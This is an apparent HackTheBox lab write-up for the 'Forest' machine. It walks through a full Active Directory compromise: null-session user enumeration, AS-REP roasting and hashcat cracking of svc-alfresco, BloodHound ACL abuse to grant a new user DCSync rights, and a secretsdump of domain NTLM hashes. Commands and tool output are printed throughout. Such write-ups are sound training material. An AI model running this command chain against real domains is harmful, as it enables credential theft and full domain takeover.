Forest - HackTheBox

Introduction

Forest is an easy level box, which involves pure Active Directory attacks. The box starts out with enumerating all the users within the domain by using a null rpc session. We can then leverage this user list to find an AS-REP roastable user. By AS-REP roasting this user, we are able obatin their hash, which can then be cracked using HashCat. We leverage this user to run Bloodhound and find out we can add ourselves to a high privilaged group, allowing WriteDACL over the domain.

Initial Enumeration

Run Nmap to see all open ports

sudo nmap -sV -sC 10.129.95.210 -oN scan.nmap -v

# Nmap 7.94SVN scan initiated Wed Sep  4 21:29:53 2024 as: nmap -sV -sC -oN scan.nmap -v 10.129.95.210
Nmap scan report for 10.129.95.210
Host is up (0.051s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-05 01:36:50Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m31s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-09-04T18:36:55-07:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-09-05T01:36:56
|_  start_date: 2024-09-05T01:33:34

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  4 21:30:15 2024 -- 1 IP address (1 host up) scanned in 21.96 seconds

See port 88 up as Kerberors, and port 3268 as LDAP, this tells me this is most likely a Windows DC. I started out by checking if null sessions were allowed with SMB.

Running the following proves that a null session is allowed, but unable to list shares

$ nxc smb 10.129.95.210 -u "" -p ""  --shares

SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.95.210   445    FOREST           [+] htb.local\:
SMB         10.129.95.210   445    FOREST           [-] Error enumerating shares: STATUS_ACCESS_DENIED

Foothold via ASREPRoast

Creating a Userlist

Due to no access to signifigant access the domain controller through a null session, I decided to use the null session to enumerate users on the machine. If we get a list of valid users I could enumerate users vulnerable to ASREProasting, due to no pre-authentication required

I first checked it the null session was allowed to enumerate users with NetExec

$ nxc smb 10.129.95.210 -u "" -p ""  --users

SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.95.210   445    FOREST           [+] htb.local\:
SMB         10.129.95.210   445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.95.210   445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain
SMB         10.129.95.210   445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.129.95.210   445    FOREST           krbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account
SMB         10.129.95.210   445    FOREST           DefaultAccount                <never>             0       A user account managed by the system.
<SNIP>
SMB         10.129.95.210   445    FOREST           svc-alfresco                  2024-09-05 01:44:34 0
SMB         10.129.95.210   445    FOREST           andy                          2019-09-22 22:44:16 0
SMB         10.129.95.210   445    FOREST           mark                          2019-09-20 22:57:30 0
SMB         10.129.95.210   445    FOREST           santi                         2019-09-20 23:02:55 0

As seen above the anonymous user is allowed to get all domain users. To get a list of these user, I used rpcclient and vim macros.

$ rpcclient -U "" -N 10.129.95.210 -c enumdomusers | tee users.txt

Now that I have my users list, I ran GetNPUsers.py, which looks for users which do not require pre-authenticaiton, the tool also automatically requests and saves a vulnerable user’s hash.

Cracking svc-alfresco’s hash

$ impacket-GetNPUsers 'htb.local/' -dc-ip 10.129.95.210 -usersfile users.txt -format hashcat -outputfile asrep-hashes.txt

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
<SNIP>
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:4bb40a38014d2f38d41c0ae6c393c832$a6452ab4d3fbb82b18066ae24e83100677e8e02846cbd0d8b5d6903bd560dbf313da5ec0ca329729a3454e47276bbaa7f7cb9eaf6daeea8204c52a8429f982c63bdc4083225001e21320b559cd538f1a3b02d629e4987eff70d058d9305cd2b9b4de5b008a356fece2b4477c476cf423c99a28b3eee5ae6eecea86e4c9607d0df1ce877486b98acc82f9a348764e81e1f156593329390b86fe3334dda4b1f26d3f71cf3474fe4302b86c6acc0c2b5fc22d750386baccf483f940a97086132d9b035b857470ecce7183f5d98d0eda4d5d3a28cb88ee16d66f7836efd8295ce3878e04715c0bb5
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

Running this, the user svc-alfresco does not require pre-authentication. Now that the user’s hash is saved, I forwarded to hashcat to crack.

$ hashcat asrep-hashes.txt /usr/share/wordlists/rockyou.txt

$krb5asrep$23$svc-alfresco@HTB.LOCAL:4bb40a38014d2f38d41c0ae6c393c832$a6452ab4d3fbb82b18066ae24e83100677e8e02846cbd0d8b5d6903bd560dbf313da5ec0ca329729a3454e47276bbaa7f7cb9eaf6daeea8204c52a8429f982c63bdc4083225001e21320b559cd538f1a3b02d629e4987eff70d058d9305cd2b9b4de5b008a356fece2b4477c476cf423c99a28b3eee5ae6eecea86e4c9607d0df1ce877486b98acc82f9a348764e81e1f156593329390b86fe3334dda4b1f26d3f71cf3474fe4302b86c6acc0c2b5fc22d750386baccf483f940a97086132d9b035b857470ecce7183f5d98d0eda4d5d3a28cb88ee16d66f7836efd8295ce3878e04715c0bb5:s3rvice

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:4bb40a38014d2f...5c0bb5
Time.Started.....: Wed Sep  4 22:02:11 2024 (9 secs)
Time.Estimated...: Wed Sep  4 22:02:20 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   447.1 kH/s (0.73ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4085248/14344385 (28.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s402gercd -> s3r3ndipit
Hardware.Mon.#1..: Util: 70%

Started: Wed Sep  4 22:02:09 2024
Stopped: Wed Sep  4 22:02:22 2024

The user’s hash is sucessfully cracked and we can now log in as that user

$ nxc smb 10.129.95.210 -u "svc-alfresco" -p "s3rvice"

SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.95.210   445    FOREST           [+] htb.local\svc-alfresco:s3rvice

Abusing ACLs

Running Bloodhound

I decided to run Bloodhound to find any possible relations from our current user

$ nxc ldap 10.129.95.210 -u "svc-alfresco" -p "s3rvice" --bloodhound -c all --dns-server 10.129.95.210 --dns-tcp

SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice
LDAP        10.129.95.210   389    FOREST           Resolved collection methods: localadmin, acl, objectprops, trusts, group, dcom, psremote, session, rdp, container
LDAP        10.129.95.210   389    FOREST           Done in 00M 17S
LDAP        10.129.95.210   389    FOREST           Compressing output into /home/parallels/.nxc/logs/FOREST_10.129.95.210_2024-09-04_220801_bloodhound.zip

Checking this user’s transitive object control, I was able to map the following path in Bloodhound.

Through nested groups, our user is apart of the Account Operators AD group, this group allows GenericAll rights over the group EXCHANGE WINDOWS PERMISSIONS. GenericAll permissions over a group allow us to add a user to that group. Once we have control over EXCHANGE WINDOWS PERMISSIONS, we can legerage WriteDACL to permit a user DCsync rights over the domain, effectivly compromising the domain through a DCsync attack.

I use Bloody-AD to create a new user to be used with this attack, we are allowed to do this because we are in the Account Operators group.

$ bloodyAD -d htb.local --host 10.129.95.210 -u "svc-alfresco" -p "s3rvice" add user "jeff" "password123\!"
[+] jeff created

As mentioned earlier, we’ll add our new user jeff to EXCHANGE WINDOWS PERMISSIONS

$ bloodyAD -d htb.local --host 10.129.95.210 -u "svc-alfresco" -p "s3rvice" add groupMember "EXCHANGE WINDOWS PERMISSIONS" "jeff"
[+] jeff added to EXCHANGE WINDOWS PERMISSIONS

Using the user jeff, we can attempt to add DCSync privilages over the domain

$ bloodyAD -d htb.local --host 10.129.95.210 -u "jeff" -p "password123\!" add dcsync jeff
[+] jeff is now able to DCSync

Domain Comprimise

We can now run secrets dump, given our new privilages.

$ secretsdump.py htb.local/jeff:'password123!'@10.129.95.210

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>